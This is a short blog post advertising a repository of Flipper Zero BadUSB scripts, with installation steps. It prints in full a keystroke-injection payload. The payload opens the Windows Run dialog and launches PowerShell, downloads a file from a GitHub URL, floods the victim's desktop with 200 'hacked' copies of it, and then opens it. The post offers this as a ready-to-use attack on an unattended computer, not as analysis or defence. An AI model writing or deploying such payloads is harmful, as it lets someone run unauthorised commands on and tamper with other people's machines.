Flipper Zero: BadUSB Scripts

Hello everyone, today I am going to present you a list of cool BadUSB scripts for the Flipper Zero.

So, I made a github repository with all the BadUSB scripts I made last week. You can find it here : SeenKid/flipper-zero-bad-usb

Flipper Zero: BadUSB Scripts

My scripts for the Flipper Zero BadUSB

This is the one I am the most proud of :

Sorry, but you have been HACKED.

REM Author: SeenKid (seenkid#1337 on Discord)
REM Description: Creates a lot of files with the text you have been hacked on desktop.
REM Version:	1.0
DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/hacked.txt -OutFile $DesktopPath/H4ck3D.txt; while($ac -lt 200) { Copy-Item "$DesktopPath/H4ck3D.txt" -Destination "$DesktopPath/hacked$ac.txt"; $ac++};Start-Process -FilePath "$DesktopPath/H4ck3D.txt" 
DELAY 100
ENTER

Installation

  • Download the repo HERE
  • drag&drop repo files in qFlipper app (SD Card/badusb)
  • You are ready 🙂

bad usb flipper zero scripts

flipper zero payloads

flipper zero badusb payloads

bad usb payloads

One comment

  1. Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you.

Leave a Reply

Your email address will not be published. Required fields are marked *